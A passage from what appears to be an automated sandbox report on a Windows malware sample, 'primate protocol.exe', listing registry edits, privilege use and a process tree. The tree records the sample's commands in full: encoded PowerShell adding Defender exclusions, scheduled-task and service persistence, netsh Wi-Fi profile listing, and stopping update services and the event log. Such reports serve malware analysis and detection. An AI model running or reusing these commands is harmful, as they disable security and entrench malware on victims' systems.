| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1746289067" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\systemprocess.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\systemprocess.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\CompPkg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\host.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\dialer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\systemprocess.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\primate protocol.exe
"C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAZQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASABFAEEARABTAEUAVAAgAE4ATwBUACAARABFAFQARQBDAFQARQBEACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBuAGYAZwAjAD4A"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawBmACMAPgA="
C:\Windows\systemprocess.exe
"C:\Windows\systemprocess.exe"
C:\Windows\host.exe
"C:\Windows\host.exe"
C:\Windows\CompPkg.exe
"C:\Windows\CompPkg.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "HOST" /sc ONLOGON /tr "C:\Windows\systemprocess.exe" /rl HIGHEST /f
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "CompPkg" /tr "C:\Users\Admin\AppData\Roaming\CompPkg.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SYSTEM32\netsh.exe
"netsh" wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "$([System.Environment]::GetEnvironmentVariable('SystemDrive'))\"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "PROCESS HOST"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "PROCESS HOST" binpath= "C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "PROCESS HOST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe
